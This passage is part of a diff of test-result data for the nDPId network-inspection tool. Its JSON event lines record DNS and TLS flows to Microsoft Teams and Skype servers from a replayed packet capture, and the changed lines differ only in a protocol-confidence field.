lVHN9ZAWzkNyqS56Hs+VXyhIUgDoTONh43ut\/yBnqLWJ6HXKcI6qe1ntdtXyoQyjYZpSOnm2uYp+6WFP8eztjtGexEu6hDqMx2fyQv\/mVl0auJxOvVANURsh9C6cu1LRWqw8SukcmJhO9ptW5iUNYclFK0BRMa7HDoqgqFCccb2WkU4sxDCVFF52CIMR33VkffteHiI9\/NgTNgZERM3tobFzsdXrDpRRXLWDage6O7fLzs8m9hERZCv46Exgndu8ho3VvbFCaZyMsnBpC0\/L6igC1xzLSs2ksZSkx5L9Q7VhMaHlPusEBUMQJ5uA6CkdGrw0a3GiTrkSUGJIGKC7WyL+yh36GZcaflqIrfqPpArwHS0O6hsLRU\/2t+Pwt19umaYcC7QuLOwfSwEr1PxrFtzW1mzlNCKarl0LmPBlPWyV5JfN4y4C1aRVZ7yV7\/4iclnIrddqAkiXdgSc+ai4OnXQhk4fgmfh+Ar5gfpmM8U2v\/X345bEZszWOszb+cdvmzW47cwiYheg59HkuZ4TWUwEFRrPkd047noDz+bhfvXLMYNCStN2XWEGpRFtvI8rpdiTmvHc7+aKDQSaaH8jzVNbso1cSOHqJjXtpeD+vrVfOMXgQ=="} 00181{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":669,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041680611} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":669,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041680294,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":850,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681218,"flow_last_seen":1587041681218,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1587041681218,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1587041681218,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1587041681218,"pkt":"EBMx8Tl2KDc3AG3ICABFAABLUFkAAP8R5\/DAqAEGwKgBAd06ADUANyl9Kf0BAAABAAAAAAAAB2NhcHRpdmUFYXBwbGUDY29tB2VkZ2VrZXkDbmV0AAABAAE="} -00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":850,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681218,"flow_last_seen":1587041681218,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1587041681218,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com.edgekey.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":850,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681218,"flow_last_seen":1587041681218,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1587041681218,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com.edgekey.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":851,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1587041681248,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1587041681248,"pkt":"KDc3AG3IEBMx8Tl2CABFAACAqEJAADkRFdPAqAEBwKgBBgA13ToAbAAAKf2BgAABAAIAAAAAB2NhcHRpdmUFYXBwbGUDY29tB2VkZ2VrZXkDbmV0AAABAAHADAAFAAEAAADSABkFZTcyNzkFZHNjZTkKYWthbWFpZWRnZcAmwDsAAQABAAAAFAAEFzKeWA=="} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":851,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041681218,"flow_last_seen":1587041681248,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1587041681248,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com.edgekey.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.50.158.88"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":851,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041681218,"flow_last_seen":1587041681248,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1587041681248,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com.edgekey.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.50.158.88"}} 00184{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":853,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041681407} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":853,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041681401,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00181{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":864,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041681611} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":864,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041681458,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":865,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681714,"flow_last_seen":1587041681714,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1587041681714,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":865,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1587041681714,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1587041681714,"pkt":"EBMx8Tl2KDc3AG3ICABFAABCnaYAAP8RmqzAqAEGwKgBAcdZADUALvSsiC0BAAABAAAAAAAABmV1LWFwaQNhc20Fc2t5cGUDY29tAAABAAE="} -00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":865,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681714,"flow_last_seen":1587041681714,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1587041681714,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"VoIP"},"dns": {"query":"eu-api.asm.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":865,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681714,"flow_last_seen":1587041681714,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1587041681714,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"VoIP"},"dns": {"query":"eu-api.asm.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":866,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681714,"flow_last_seen":1587041681714,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041681714,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63106,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":866,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1587041681714,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1587041681714,"pkt":"EBMx8Tl2KDc3AG3ICABFAABRU9EAAP8R5HLAqAEGwKgBAfaCADUAPVgfcugBAAABAAAAAAAAB2V1LXByb2QHYXN5bmNndwV0ZWFtcwltaWNyb3NvZnQDY29tAAABAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":866,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681714,"flow_last_seen":1587041681714,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041681714,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63106,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"eu-prod.asyncgw.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":866,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681714,"flow_last_seen":1587041681714,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041681714,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63106,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"eu-prod.asyncgw.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1587041681744,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1587041681744,"pkt":"KDc3AG3IEBMx8Tl2CABFAAC9OkBAADkRg5jAqAEBwKgBBgA19oIAqQAAcuiBgAABAAMAAAAAB2V1LXByb2QHYXN5bmNndwV0ZWFtcwltaWNyb3NvZnQDY29tAAABAAHADAAFAAEAAAvAACoVYXNtLWFwaS1wcm9kLWV1LXRlYW1zDnRyYWZmaWNtYW5hZ2VyA25ldADAQQAFAAEAAAEsABoOd2V1MS1hcGktdGVhbXMIY2xvdWRhcHDAZsB3AAEAAQAAAAoABDRyS0Y="} -00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":873,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681744,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1587041681744,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63106,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"eu-prod.asyncgw.teams.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.75.70"}} +00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":873,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681744,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1587041681744,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63106,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"eu-prod.asyncgw.teams.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.75.70"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":874,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681745,"flow_last_seen":1587041681745,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041681745,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1587041681745,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041681745,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VHAqAEGNHJLRux6AbuCUaOxAAAAALAC\/\/8ErAAAAgQFtAEDAwUBAQgKMISsLQAAAAAEAgAA"} 00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":875,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1587041681754,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":182,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":182,"pkt_l4_len":148,"thread_ts_msec":1587041681754,"pkt":"KDc3AG3IEBMx8Tl2CABFAACo\/M1AADkRwR\/AqAEBwKgBBgA1x1kAlAAAiC2BgAABAAMAAAAABmV1LWFwaQNhc20Fc2t5cGUDY29tAAABAAHADAAFAAEAAAb4ACQPYXNtLWFwaS1wcm9kLWV1DnRyYWZmaWNtYW5hZ2VyA25ldADAMgAFAAEAAAEsABoOd2V1MS1hcGktc2t5cGUIY2xvdWRhcHDAUcBiAAEAAQAAAAUABDRyS0U="} -00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":875,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681754,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041681754,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"eu-api.asm.skype.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.75.69"}} +00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":875,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681754,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041681754,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"eu-api.asm.skype.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.75.69"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":876,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681755,"flow_last_seen":1587041681755,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041681755,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":876,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1587041681755,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041681755,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VLAqAEGNHJLRex7AbtPkLhOAAAAALAC\/\/8ixgAAAgQFtAEDAwUBAQgKMISsNwAAAAAEAgAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":877,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1587041681772,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041681772,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8MUxAAG0Gmwk0cktGwKgBBgG77HoxlVjpglGjsqASIACccwAAAgQFoAEDAwgEAggKVud31zCErC0="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":878,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1587041681772,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041681772,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V3AqAEGNHJLRux6AbuCUaOyMZVY6oAQEAnbCgAAAQEICjCErEZW53fX"} -00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":879,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041681745,"flow_last_seen":1587041681772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1587041681772,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-prod.asyncgw.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":879,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041681745,"flow_last_seen":1587041681772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1587041681772,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-prod.asyncgw.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":880,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1587041681786,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041681786,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8PqJAAGwGjrQ0cktFwKgBBgG77HsaOOK2T5C4T6ASIABGlgAAAgQFoAEDAwgEAggKVN17aDCErDc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":881,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1587041681786,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041681786,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V7AqAEGNHJLRex7AbtPkLhPGjjit4AQEAmFKgAAAQEICjCErFNU3Xto"} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":882,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041681755,"flow_last_seen":1587041681786,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1587041681786,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":882,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041681755,"flow_last_seen":1587041681786,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1587041681786,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00878{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":891,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041681745,"flow_last_seen":1587041681802,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":333,"midstream":0,"thread_ts_msec":1587041681802,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-prod.asyncgw.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 